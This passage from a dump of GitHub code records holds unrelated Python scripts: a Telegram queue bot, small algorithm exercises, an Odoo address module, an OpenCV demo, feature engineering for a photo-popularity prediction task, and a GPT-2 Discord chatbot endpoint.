self.banner.queue.actual().filter(telegram_chat_id=self.message.chat.id).first()\n\n @cached_property\n def people_ahead_count(self):\n return self.banner.queue.actual().filter(position__lt=self.queue_item.position).count()\n\n def send_message_to_bot(self):\n queue_msg = f\"There are {self.people_ahead_count} in front of you.\"\n\n markup = types.ReplyKeyboardMarkup(row_width=1)\n queue_length_btn = types.KeyboardButton('/check queue length')\n markup.add(queue_length_btn)\n self.bot.send_message(self.message.chat.id, queue_msg,\n reply_markup=markup)\n\n def error_msg_and_failure(self, failure_msg):\n self.bot.send_message(self.message.chat.id, failure_msg)\n return Failure(failure_msg)\n","repo_name":"Alexander-Andrade/qlapse","sub_path":"banners/services/queue_item_services/telegram_services/calc_people_ahead.py","file_name":"calc_people_ahead.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26703499169","text":"#!/usr/local/bin/python3\n\n# WHAT DOES THIS SCRIPT DO? \n# This script will check if the provided filename or dirname is present\n\nimport os.path\nimport sys\nimport subprocess\n\n# Get arguments into a list called \"args\"\nargs = sys.argv\n\nif len(args) == 2:\n if os.path.isfile(args[1]):\n print(\"The File \", args[1], \" does exist on this system\", sep=\" \")\n elif os.path.isdir(args[1]):\n print(\"The Directory \", args[1], \" does exist on this system\", sep=\" \")\n else:\n print(\"the requested file or directory does not exist on this system\")\nelse:\n print(\"usage (only 2 arguments): EXAMPLE => python3 ispresent.py [directory or file absolute path]\")","repo_name":"sysadmin-exe/pythontooling","sub_path":"ispresent.py","file_name":"ispresent.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15222557650","text":"X, Y = map(int, input().split())\nZ = int(Y*100/X)\n\ndef bs(left, right):\n if left >= right:\n return left\n mid = (left+right)//2\n if int((Y+mid)*100/(X+mid)) == Z:\n return bs(mid+1,right)\n else:\n return bs(left,mid)\nif Z == 99 or Z == 100:\n print(-1)\nelse:\n print(bs(1,X))","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj1072.py","file_name":"boj1072.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13060752504","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# https://www.hackerrank.com/challenges/one-month-preparation-kit-maxsubarray/problem\n# Complete the 'maxSubarray' function below.\n#\n# The function is expected to return an INTEGER_ARRAY.\n# The function accepts INTEGER_ARRAY arr as parameter.\n#\n\ndef maxSubarray(arr):\n # Write your code here\n curr_sum = -math.inf\n best_sum = -math.inf\n\n for x in arr:\n curr_sum = max(x, curr_sum + x)\n best_sum = max(best_sum, curr_sum)\n\n non_neg_arr = [x for x in arr if x >= 0]\n if len(non_neg_arr) > 0:\n subarr_summ = sum(non_neg_arr)\n else:\n subarr_summ = max(arr)\n\n return best_sum, subarr_summ\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input().strip())\n\n for t_itr in range(t):\n n = int(input().strip())\n\n arr = list(map(int, input().rstrip().split()))\n\n result = maxSubarray(arr)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"shurupyan/hacker-rank-python-training","sub_path":"one_month_preparation_kit/maxsubarray.py","file_name":"maxsubarray.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71645752748","text":"#내가 쓴 답변 -> 시간 초과\nimport sys\nN, S = map(int, sys.stdin.readline().split())\narr = list(map(int, sys.stdin.readline().split()))\nMcnt = N\na = 0\nwhile a < N:\n dp = 0\n cnt = 0\n for i in range(a, len(arr)):\n dp += arr[i]\n cnt += 1\n if dp >= S:\n Mcnt = min(cnt, Mcnt)\n a += 1\nprint(Mcnt)\n# 모든 저렇게 하면 모든 부분합을 구하기 때문에 비효율적이고 시간도 많이 걸림!\n# 연속된 S보다 큰 값만 도출 할 수 있도록 하는 방법이 필요함(그리고 최대한 부분합 원소의 개수도 적게)\n\n#참조용\nimport sys\nN, S = map(int, sys.stdin.readline().split())\narr = list(map(int, input().split()))\nMcnt = N+1\nsum = [0] * (N + 1)\nfor i in range(1, N + 1):\n sum[i] = sum[i-1] + arr[i-1]\nstart = 0\nend = 1\nwhile start != N:\n if sum[end]-sum[start] >= S:\n if Mcnt > end - start:\n Mcnt = end- start\n start += 1\n else:\n if end != N:\n end += 1\n else:\n start += 1\nif Mcnt != N+1:\n print(Mcnt)\nelse:\n print(0)\n\n\n# 첫째로 부분합을 나타내는 것으로, sum(i) -> 0부터 i번째 까지의 숫자를 더한 값이 나타나는 리스트 생성\n# 이때 부분합은 sum(N) - sum(M) 을 통해서 arr[N:M]에 해당하는 값을 찾을 수 있음\n# 투 포인트라는 것이 중요함!\n# start와 end의 값을 설정하여 두 값이 N까지 갈 때까지만 실행 시켜도 원하는 답이 나오도록 함!\n","repo_name":"psy-choi/Quiz-of-Data-structures","sub_path":"BJ1806.py","file_name":"BJ1806.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33322381359","text":"from lxml import etree\n\nfrom odoo import models, api, fields\nfrom odoo.tools.translate import _\n\n\nclass ResCompany(models.Model):\n _inherit = \"res.company\"\n\n district_id = fields.Many2one(comodel_name='res.country.district', string='District',\n domain=\"[('state_id','=', state_id)]\")\n ward_id = fields.Many2one(comodel_name='res.country.ward', string='Ward',\n domain=\"[('district_id', '=', district_id)]\")\n\n def _makeaddress(self, ward_name=\"\", district_name=\"\"):\n if (ward_name != False and district_name != False):\n return (str(ward_name) + \", \" + str(district_name))\n else:\n return \"\"\n\n @api.onchange('district_id')\n def _district_onchange(self):\n self.street2 = self.district_id.name\n self.ward_id = False\n self.city = self.state_id.name\n\n @api.onchange('ward_id')\n def _ward_onchange(self):\n self.street2 = self.ward_id.slug2\n self.city = self.state_id.name\n\n @api.onchange('state_id')\n def _onchange_state_id(self):\n if self.state_id:\n self.city = self.state_id.name\n self.district_id = False\n self.ward_id = False\n # self.zip = self.state_id.zipcode\n elif self._origin:\n self.district_id = False\n self.ward_id = False\n self.city = False\n self.zip = False\n\n # @api.model\n # def _address_fields(self):\n # \"\"\"Returns the list of address fields that are synced from the parent.\"\"\"\n # return super(ResCompany, self)._address_fields() + ['state_id', ]\n\n\n @api.model\n def _default_get(self, default_fields):\n \"\"\"Set default value by fields \"\"\"\n values = super(ResCompany, self)._default_get(default_fields)\n values.update({\n \"default_website\": \"https://\",\n \"default_country_id.id\": 241,\n })\n return values\n","repo_name":"beanfamily/beanfamily_odoo_addons","sub_path":"bean_address/models/res_company.py","file_name":"res_company.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3109724273","text":"import cv2 as cv\nimport numpy as np\n'''\n轮廓近似\n采用Douglas-Peucker算法\ncv.approxPolyDP()\n将原轮廓的形状用更少的点组成新轮廓\n参数二(epsilon):原始轮廓到近似轮廓的最大距离\n是一个准度参数\n返回一个由轮廓上的点构成的列表\n'''\nimgx = cv.imread('ww.jpg')\nimg = cv.imread('ww.jpg',0)\nret,thresh = cv.threshold(img,127,255,0)\nret,contours,hierarchy = cv.findContours(thresh,1,2)\n\ncnt = contours[0]\n\nepsilon = 0.01*cv.arcLength(cnt,True)\n#epsilon = 0.1*cv.arcLength(cnt,True)\napprox = cv.approxPolyDP(cnt,epsilon,True)\n\nprint('epsilon',epsilon)\nprint('approx',approx)\n\n#画出用来近似轮廓的所有点\nfor i in range(len(approx)):\n\tcv.circle(imgx,(approx[i,0,0],approx[i,0,1]),5,(0,255,0),2)\n\ncv.imshow('imgx',imgx)\ncv.waitKey(0)","repo_name":"liuzijie23/cv_code","sub_path":"cv6/cv_8.py","file_name":"cv_8.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12042485287","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport json\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom time import gmtime, strftime\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nimport random\nimport os\nimport re\nimport json\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgbm\nfrom datetime import datetime\nfrom time import gmtime, strftime\nfrom scipy import stats\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\n\nimport lightgbm\nfrom sklearn.model_selection import StratifiedKFold, KFold\nfrom sklearn.metrics import f1_score, mean_absolute_error, mean_squared_error\n\nfrom gensim.models import KeyedVectors\nfrom gensim.scripts.glove2word2vec import glove2word2vec\n\nimport json\nimport os\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgbm\nfrom datetime import datetime\nfrom time import gmtime, strftime\nfrom scipy import stats\nfrom PIL import Image\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.model_selection import StratifiedKFold, KFold\nfrom sklearn.metrics import f1_score, mean_absolute_error, mean_squared_error\n\n\nrandom_seed = 2020\nrandom.seed(random_seed)\nnp.random.seed(random_seed)\n\n\n# In[2]:\n\n\ntrain_category = json.load(open('./data/train_all_json/train_category.json', encoding=\"utf-8\"))\ntrain_category_pd = pd.DataFrame(train_category)\n\ntrain_additional = json.load(open('./data/train_all_json/train_additional.json', encoding=\"utf-8\"))\ntrain_additional_pd = pd.DataFrame(train_additional)\n\ntrain_tags = json.load(open('./data/train_all_json/train_tags.json', encoding=\"utf-8\"))\ntrain_tags_pd = pd.DataFrame(train_tags)\n\ntrain_temporalspatial = json.load(open('./data/train_all_json/train_temporalspatial.json', encoding=\"utf-8\"))\ntrain_temporalspatial_pd = pd.DataFrame(train_temporalspatial)\n\ntrain_userdata = json.load(open('./data/train_all_json/train_userdata.json', encoding=\"utf-8\"))\ntrain_userdata_pd = pd.DataFrame(train_userdata)\n\ntrain_img_pd = pd.read_csv('./data/train_all_json/train_img.txt', header=None)\ntrain_img_pd.columns = ['img']\ntrain_img_pd['img_file'] = train_img_pd['img'].apply(lambda x: './data/train/' + x[30:] + '.jpg')\n\ntrain_label_pd = pd.read_csv('./data/train_all_json/train_label.txt', header=None)\ntrain_label_pd.columns = ['label']\n\ntrain_data = train_category_pd.merge(train_additional_pd, on=('Pid', 'Uid'), how='left')\ntrain_data = train_data.merge(train_tags_pd, on=('Pid', 'Uid'), how='left')\ntrain_data = train_data.merge(train_temporalspatial_pd, on=('Pid', 'Uid'), how='left')\n\ntrain_data = pd.concat([train_data, train_userdata_pd, train_img_pd, train_label_pd], axis=1)\nprint(len(train_data))\nprint(train_data.columns)\n\n\n# In[3]:\n\n\ntest_category = json.load(open('./data/test_all_json/test_category.json', encoding=\"utf-8\"))\ntest_category_pd = pd.DataFrame(test_category)\n\ntest_additional = json.load(open('./data/test_all_json/test_additional.json', encoding=\"utf-8\"))\ntest_additional_pd = pd.DataFrame(test_additional)\n\ntest_tags = json.load(open('./data/test_all_json/test_tags.json', encoding=\"utf-8\"))\ntest_tags_pd = pd.DataFrame(test_tags)\n\ntest_temporalspatial = json.load(open('./data/test_all_json/test_temporalspatial.json', encoding=\"utf-8\"))\ntest_temporalspatial_pd = pd.DataFrame(test_temporalspatial)\n\ntest_userdata = json.load(open('./data/test_all_json/test_userdata.json', encoding=\"utf-8\"))\ntest_userdata_pd = pd.DataFrame(test_userdata)\n\ntest_img_pd = pd.read_csv('./data/test_all_json/test_imgfile.txt', header=None)\ntest_img_pd.columns = ['img']\n# test_img_pd['img_file'] = test_img_pd['img']\ntest_img_pd['img_file'] = test_img_pd['img']\n\ntest_data = test_category_pd.merge(test_additional_pd, on=('Pid', 'Uid'), how='left')\ntest_data = test_data.merge(test_tags_pd, on=('Pid', 'Uid'), how='left')\ntest_data = test_data.merge(test_temporalspatial_pd, on=('Pid', 'Uid'), how='left')\n\ntest_data = pd.concat([test_data, test_userdata_pd, test_img_pd], axis=1)\ntest_data['label'] = -1\n\nprint(len(test_data))\nprint(test_data.columns)\n\n\n# In[4]:\n\n\n\ndef pandas_split_valid_test_dataset(pandas_dataset, valid_ratio=0.1, test_ratio=0.1, shuffle=True):\n \n index = list(range(len(pandas_dataset)))\n# if shuffle:\n# random.shuffle(index)\n \n length = len(pandas_dataset)\n len_valid = int(length * valid_ratio + 0.6)\n len_test = int(length * test_ratio + 0.6)\n\n train_data = pandas_dataset.loc[index[:-len_test-len_valid]]\n valid_data = pandas_dataset.loc[index[-len_test-len_valid:-len_test]]\n test_data = pandas_dataset.loc[index[-len_test:]]\n return train_data, valid_data, test_data\n\ntrain_df, valid_df, test_df = pandas_split_valid_test_dataset(train_data, valid_ratio=0.1, test_ratio=0.1, shuffle=True)\nprint(len(train_df), len(valid_df), len(test_df))\n\n\ntrain_df['train_type'] = 0\nvalid_df['train_type'] = 1\ntest_df['train_type'] = 2\ntest_data['train_type'] = -1\n\nall_data = pd.concat([train_df, valid_df, test_df, test_data], axis=0, sort=False)\nall_data = all_data.reset_index(drop=True)\n# print(len(all_data))\n# all_data = all_data.fillna('0')\n\nall_data.to_csv('./data/combine_data_530.csv', header=True)\n\n\n# In[ ]:\n\n\n\n\n\n# In[5]:\n\n\nall_data = pd.read_csv('./data/combine_data_530.csv', low_memory=False)\nall_data = all_data.fillna('0')\n\n\n# In[6]:\n\n\nglove_file ='./data/glove.42B.300d.txt' # 已有的glove词向量\ntmp_file = './data/word2vec.txt' # 指定转化为word2vec格式后文件的位置\n(count, dimensions) = glove2word2vec(glove_file, tmp_file)\nprint(count, dimensions)\nprint('glove2word2vec over')\n\n# 加载转化后的文件 # 使用gensim载入word2vec词向量\nwv_model = KeyedVectors.load_word2vec_format('./data/word2vec.txt')\nprint('load over')\n\n\n# In[7]:\n\n\n\n\nAlltags_split = all_data['Alltags'].apply(lambda x: x.lower().split(' '))\n# Alltags_split = all_data['Alltags'].apply(lambda x: [w for w in re.sub('[^0-9a-zA-Z]', \" \", x).lower().split(' ') if w != \"\"])\n\ntags_ans = []\nfor sentence in Alltags_split:\n v = [wv_model[w] for w in sentence if w in wv_model]\n if len(v) == 0:\n tags_ans.append(np.zeros(300))\n else:\n tags_ans.append(np.mean(v, 0))\n\nalltags_feature = np.array(tags_ans)\n\npd_alltags_feature = pd.DataFrame(alltags_feature, dtype='float')\npd_alltags_feature.columns = ['alltags_fe_{}'.format(i) for i in range(300)]\npd_alltags_feature.to_csv('./data/alltags_feature.csv', header=True, index=None)\n\nprint('alltag over!')\n\n\n# In[8]:\n\n\n\nTitle_split = all_data['Title'].apply(lambda x: x.lower().split(' '))\n# Title_split = all_data['Title'].apply(lambda x: [w for w in re.sub('[^0-9a-zA-Z]', \" \", x).lower().split(' ') if w != \"\"])\n\ntitle_ans = []\nfor sentence in Title_split:\n v = [wv_model[w] for w in sentence if w in wv_model]\n if len(v) == 0:\n title_ans.append(np.zeros(300))\n else:\n title_ans.append(np.mean(v, 0))\n\ntitle_feature = np.array(title_ans)\n\npd_title_feature = pd.DataFrame(title_feature, dtype='float')\npd_title_feature.columns = ['title_fe_{}'.format(i) for i in range(300)]\npd_title_feature.to_csv('./data/title_feature.csv', header=True, index=None)\n\nprint('title over!')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[9]:\n\n\nuser_path = dict()\nfor i in range(len(all_data)):\n user = all_data['Uid'][i]\n path = all_data['Pathalias'][i]\n \n if user not in user_path:\n user_path[user] = set()\n if path != 'None':\n user_path[user].add(path)\n\nPathalias_list = []\nfor i in range(len(all_data)):\n user = all_data['Uid'][i]\n if len(user_path[user]) != 0:\n Pathalias_list.append(list(user_path[user])[0])\n else:\n Pathalias_list.append('None')\nall_data['Pathalias'] = Pathalias_list\n\n\n# In[10]:\n\n\nuser_additional = pd.read_csv('./data/user_additional.csv')\nuser_additional[user_additional['Pathalias'] == 'None'] = ['None', 0, 0, 0, 0, 0, 0, 0, 0]\n\nall_data = pd.merge(all_data, user_additional, on='Pathalias', how='left')\nall_data['label'] = all_data['label'].apply(lambda x: x if x!=-1 else 0)\n\n\n# In[11]:\n\n\ndef get_img_data(img_file):\n if os.path.exists(img_file) == True:\n return img_file\n else:\n return './data/none_picture.jpg'\n\ndef get_feature(data_df):\n\n feature_data = pd.DataFrame()\n feature_data['Pid'] = data_df['Pid']\n feature_data['train_type'] = data_df['train_type']\n \n Uid_set=set(data_df['Uid'])\n Uid_map = dict(zip(Uid_set, list(range(len(Uid_set)))))\n feature_data['Uid'] = data_df['Uid'].map(Uid_map)\n \n feature_data['Uid_count'] = data_df['Uid'].map(dict(data_df.groupby('Uid')['Pid'].count()))\n feature_data['mean_label']= data_df['Uid'].map(dict(data_df.groupby('Uid')['label'].mean()))\n \n # Category\n Category_set=set(data_df['Category'])\n Category_map = dict(zip(Category_set, list(range(len(Category_set)))))\n feature_data['Category'] = data_df['Category'].map(Category_map)\n\n Subcategory_set=set(data_df['Subcategory'])\n Subcategory_map = dict(zip(Subcategory_set, list(range(len(Subcategory_set)))))\n feature_data['Subcategory'] = data_df['Subcategory'].map(Subcategory_map)\n \n Concept_set=set(data_df['Concept'])\n Concept_map = dict(zip(Concept_set, list(range(len(Concept_set)))))\n feature_data['Concept'] = data_df['Concept'].map(Concept_map)\n \n # title alltags base\n feature_data['Title_len'] = data_df['Title'].apply(lambda x: len(x))\n feature_data['Title_number'] = data_df['Title'].apply(lambda x: len(x.lower().split(' ')))\n feature_data['Alltags_len'] = data_df['Alltags'].apply(lambda x: len(x))\n feature_data['Alltags_number'] = data_df['Alltags'].apply(lambda x: len(x.lower().split(' ')))\n \n # img base\n data_df['img_file'] = data_df['img_file'].apply(lambda x: get_img_data('/home/ssd1/yhzhang/SMP2020/' + x))\n img_mode_map = {'P': 0, 'L': 1, 'RGB': 2, 'CMYK': 3}\n img_length, img_width, img_pixel, img_model = [], [], [], []\n for file in data_df['img_file']:\n pm = Image.open(file)\n img_length.append(pm.size[0])\n img_width.append(pm.size[1])\n img_pixel.append(pm.size[0] * pm.size[1])\n img_model.append(img_mode_map[pm.mode])\n feature_data['img_length'] = img_length\n feature_data['img_width'] = img_width\n feature_data['pixel'] = img_pixel\n feature_data['img_model'] = img_model\n \n # title svd\n tf_idf_enc_t = TfidfVectorizer(ngram_range=(1, 2))\n tf_idf_vec_t = tf_idf_enc_t.fit_transform(data_df['Title'])\n svd_enc_t = TruncatedSVD(n_components=20, n_iter=100, random_state=2020)\n mode_svd_t = svd_enc_t.fit_transform(tf_idf_vec_t)\n mode_svd_t = pd.DataFrame(mode_svd_t)\n mode_svd_t.columns = ['svd_mode_t_{}'.format(i) for i in range(20)]\n feature_data = pd.concat([feature_data, mode_svd_t], axis=1)\n \n # Tags svd\n tf_idf_enc = TfidfVectorizer(ngram_range=(1, 2))\n tf_idf_vec = tf_idf_enc.fit_transform(data_df['Alltags'])\n svd_enc = TruncatedSVD(n_components=20, n_iter=100, random_state=2020)\n mode_svd = svd_enc.fit_transform(tf_idf_vec)\n mode_svd = pd.DataFrame(mode_svd)\n mode_svd.columns = ['svd_mode_{}'.format(i) for i in range(20)]\n feature_data = pd.concat([feature_data, mode_svd], axis=1)\n \n Mediatype_set=set(data_df['Mediatype'])\n Mediatype_map = dict(zip(Mediatype_set, list(range(len(Mediatype_set)))))\n feature_data['Mediatype'] = data_df['Mediatype'].map(Mediatype_map)\n \n # Temporal-spatial\n data_df['datetime'] = data_df['Postdate'].apply(lambda x: datetime.fromtimestamp(int(x)))\n feature_data['hour'] = data_df['datetime'].apply(lambda x: x.hour)\n feature_data['day'] = data_df['datetime'].apply(lambda x: x.day)\n feature_data['weekday'] = data_df['datetime'].apply(lambda x: x.weekday())\n feature_data['week_hour'] = data_df['datetime'].apply(lambda x: x.weekday() * 7 + x.hour)\n feature_data['year_weekday'] = data_df['datetime'].apply(lambda x: x.isocalendar()[1])\n \n feature_data['Longitude'] = data_df['Longitude'].apply(lambda x: float(x))\n feature_data['Latitude'] = data_df['Latitude'].apply(lambda x: float(x))\n \n feature_data['Geoaccuracy'] = pd.DataFrame(data_df['Geoaccuracy'], dtype='int')\n \n # User data\n feature_data['photo_count'] = pd.DataFrame(data_df['photo_count'], dtype='int')\n feature_data['ispro'] = pd.DataFrame(data_df['ispro'], dtype='int')\n \n user_fe = pd.DataFrame(np.array(list(data_df[\"user_description\"].apply(lambda x: x.split(',')))), dtype='float')\n user_fe.columns = ['user_fe_{}'.format(i) for i in range(399)]\n \n loc_fe =pd.DataFrame(np.array(list(data_df[\"location_description\"].apply(lambda x: x[:-2].split(',') if x[:-2] !='' else ['0.0']*400))), dtype='float')\n loc_fe.columns = ['loc_fe_{}'.format(i) for i in range(400)]\n feature_data = pd.concat([feature_data, user_fe, loc_fe], axis=1)\n \n photo_firstdate = data_df['photo_firstdate'].apply(lambda x: datetime.fromtimestamp(int(x) if x!='None' else 0))\n feature_data['firstdate'] = (data_df['datetime'] - photo_firstdate).apply(lambda x: x.days)\n feature_data['firstweek'] = feature_data['firstdate'] // 7\n feature_data['firstmonth'] = feature_data['firstdate'] // 30\n \n photo_firstdatetaken = data_df['photo_firstdatetaken'].apply(lambda x: datetime.fromtimestamp(int(x)))\n feature_data['firstdatetaken'] = (data_df['datetime'] - photo_firstdatetaken).apply(lambda x: x.days)\n feature_data['firstdatetakenweek'] = feature_data['firstdatetaken'] // 7\n feature_data['firstdatetakenmonth'] = feature_data['firstdatetaken'] // 30\n\n # Additional\n feature_data['totalViews'] = pd.DataFrame(data_df['totalViews'], dtype='int')\n feature_data['totalTags'] = pd.DataFrame(data_df['totalTags'], dtype='int')\n feature_data['totalGeotagged'] = pd.DataFrame(data_df['totalGeotagged'], dtype='int')\n feature_data['totalFaves'] = pd.DataFrame(data_df['totalFaves'], dtype='int')\n feature_data['totalInGroup'] = pd.DataFrame(data_df['totalInGroup'], dtype='int')\n feature_data['photoCount'] = pd.DataFrame(data_df['photoCount'], dtype='int')\n meanView, meanTags, meanFaves = [], [], []\n for i in range(len(data_df['photoCount'])):\n if data_df['photoCount'][i] == 0:\n meanView.append(0)\n meanTags.append(0)\n meanFaves.append(0)\n else:\n meanView.append(data_df['totalViews'][i] / data_df['photoCount'][i])\n meanTags.append(data_df['totalTags'][i] / data_df['photoCount'][i])\n meanFaves.append(data_df['totalFaves'][i] / data_df['photoCount'][i])\n feature_data['meanView'] = meanView\n feature_data['meanTags'] = meanTags\n feature_data['meanFaves'] = meanFaves\n feature_data['followerCount'] = pd.DataFrame(data_df['followerCount'], dtype='int')\n feature_data['followingCount'] = pd.DataFrame(data_df['followingCount'], dtype='int')\n \n Ispublic_set=set(data_df['Ispublic'])\n Ispublic_map = dict(zip(Ispublic_set, list(range(len(Ispublic_set)))))\n feature_data['Ispublic'] = data_df['Ispublic'].map(Ispublic_map)\n\n # label\n feature_data['label'] = pd.DataFrame(data_df['label'], dtype='float')\n return feature_data\n\n\nsave_feature_df = get_feature(all_data)\nsave_feature_df.to_csv('./data/feature_data_530.csv', header=True, index=None)\nprint('feature save!')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"runnerxin/HyFea","sub_path":"get_data_feature.py","file_name":"get_data_feature.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"4427665569","text":"\n\n# python discord_flask.py\n\n\n\nfrom os.path import expanduser\nhome = expanduser(\"~\")\n\n# curl -d \"heystuff\" -X POST http://localhost:8111/submit_text\n\n# TODO: Use smaller model\nfrom transformers import GPT2LMHeadModel, GPT2Tokenizer\ntokenizer = GPT2Tokenizer.from_pretrained(\"gpt2\")\nmodel = GPT2LMHeadModel.from_pretrained(\"gpt2\", pad_token_id=tokenizer.eos_token_id) \n\n\n\nimport torch\nimport numpy as np\n\n\nfrom flask import Flask, render_template, url_for #, redirect\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '123'\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import TextAreaField\nfrom wtforms.validators import DataRequired\n# from flask import jsonify\nfrom flask import request\n\n\nclass MyForm(FlaskForm):\n input_ = TextAreaField('INPUT', id ='contentcode') #, validators=[DataRequired()])\n\n\n\n\n# @app.route('/', methods=('GET', 'POST'))\n# @app.route('/home', methods=('GET', 'POST'))\n# def home():\n# data = []\n# form = MyForm()\n# if request.method == 'GET':\n# return render_template('home.html', data=data, title='DV', form=form)\n# return render_template('home.html', data=data, title='DV', form=form)\n\n# prompt1 = 'Eberron embraces swashbuckling action and pulp adventure while adding \\\n# a layer of noir intrigue. Daring heroes battle villains in high-stakes \\\n# instances of over-the-top action, dealing with narrow escapes and ominous \\\n# mysteries that threaten the world’s safety. But stories don’t always end \\\n# well, villains sometimes succeed, and there isn’t a perfect answer to every \\\n# problem. Magic is common, and weaved through everyday life. \\\n# \\n Greybeard is a wise wizard that has a staff. I ask Greybeard'\n\n\n\n# prompt1 = 'greybeard: Im an old wizard. I cast speels.\\\n# \\nme: what is your staff made of? \\\n# \\ngreybeard: its a wooden staff, lad \\\n# \\nme: how old are you? \\\n# \\ngreybeard: im as old as the trees, lad \\\n# \\nme: where are we going? \\\n# \\ngreybeard: to wonderland, lad \\\n# \\nme:'\n# prompt2 = \"\\ngreybeard:\"\n\n\n\n\n\ntorn_fristo_1 = \"User: Who are you? \\\n\\nTorn Fristo: I...I don't remember\\\n\\nUser: What are you doing here? \\\n\\nTorn Fristo: Please...help me get out. I'm afraid \\\n\\nUser: What is your name? \\\n\\nTorn Fristo: I think...it was Turdy \\\n\\nUser: How did you end up here? \\\n\\nTorn Fristo: I...remember a poopy hole \\\n\\nUser: Where are we? \\\n\\nTorn Fristo: In a Tarasque anus...I think \\\n\\nUser: Will you help us? \\\n\\nTorn Fristo: I'm scared...but I'll try \\\n\\nUser: Are you okay? \\\n\\nTorn Fristo: It smells...poopy in here \\\n\\nUser: What was that? \\\n\\nTorn Fristo: Poop worms...nasty creatures \\\n\\nUser: Are you dead? \\\n\\nTorn Fristo: I'm as dead as this poop...this poop \\\n\\nUser: How can we help you? \\\n\\nTorn Fristo: Free me...please...from this poopy prison \\\n\\nUser:\"\ntorn_firsto_2 = \"\\nTorn Fristo:\"\n\n\n\n\n\n\n\n\n\n@app.route('/submit_text', methods=('GET', 'POST'))\ndef submit_text():\n form = MyForm()\n # if request.method == 'GET':\n # return render_template('home.html', title='DV')\n if request.method == 'POST':\n # print (request._cached_json[0])\n text = request._cached_json[0]['text']\n print (text)\n\n prompt = ''\n\n if text.startswith(\"To Torn:\"):\n text = text.split('To Torn:')[1]\n prompt = torn_fristo_1 + text + torn_firsto_2\n\n elif text.startswith(\"To Karina:\"):\n text = text.split('To Karina:')[1]\n prompt = karina_1 + text + karina_2\n\n elif text.startswith(\"To Kaspar:\"):\n text = text.split('To Kaspar:')[1]\n prompt = kasper_1 + text + kasper_2\n\n # print (prompt)\n\n\n if len(prompt) > 0:\n\n # prompt = prompt1 + text + prompt2\n input_ids = tokenizer.encode(prompt) #, max_length=512)\n input_ids = np.array(input_ids)\n input_ids = np.reshape(input_ids, [1,-1])\n input_ids = torch.tensor(input_ids)\n\n # print (input_ids.shape)\n input_len = input_ids.shape[1]\n # print (len(input_ids))\n\n n_tokens_to_sample = 25\n\n # top_p set 0.75\n aa = model.generate(do_sample=True, top_p=.5, max_length=input_len+n_tokens_to_sample, input_ids=input_ids)\n \n aa = aa.numpy()\n aa = aa[0]\n # print ( tokenizer.decode(aa))\n # print ()\n aa = aa[input_len:]\n text = tokenizer.decode(aa)\n print ('output1:', text)\n\n if '\\nUser:' in text:\n text = text.split('\\nUser:')[0]\n\n if len(text.strip(' ') )== 0: \n return {'hey': ''}, 200\n\n\n return {'hey': text}, 200\n\n else:\n return {'hey': ''}, 200\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='localhost', port=8111)\n\n\n\n\n\n","repo_name":"ChristopherBaim/DiscordBot","sub_path":"discord_flask.py","file_name":"discord_flask.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26097111136","text":"import json\nfrom dotenv import load_dotenv\nfrom torch.utils.data import Dataset, DataLoader\nfrom itertools import permutations\n\nload_dotenv()\n\nclass DatasetMapper(Dataset):\n\n def __init__(self, sentences, entities_1, entities_2, relations):\n self.sentences = sentences\n self.entities_1 = entities_1\n self.entities_2 = entities_2\n self.relations = relations\n\n def __len__(self):\n return len(self.sentences)\n\n def __getitem__(self, idx):\n return self.sentences[idx], self.entities_1[idx], self.entities_2[idx], self.relations[idx]\n\n\ndef prepare_data(data_path, labels2id, batch_size):\n\n sentences, entities_1, entities_2, relations = read_json_file(data_path, labels2id)\n data_loader = DataLoader(DatasetMapper(sentences, entities_1, entities_2, relations), batch_size=batch_size)\n return data_loader\n\n\n# return sentences, idx within the sentence of entity-markers-start, relation labels\ndef read_json_file(json_file, labels2id, multi_label=False):\n\n sentences, entities_1, entities_2, relations = [], [], [], []\n\n with open(json_file) as data_file:\n for json_elem in data_file:\n document = json.loads(json_elem)\n\n # consider only the sentences with at least 2 entities\n if 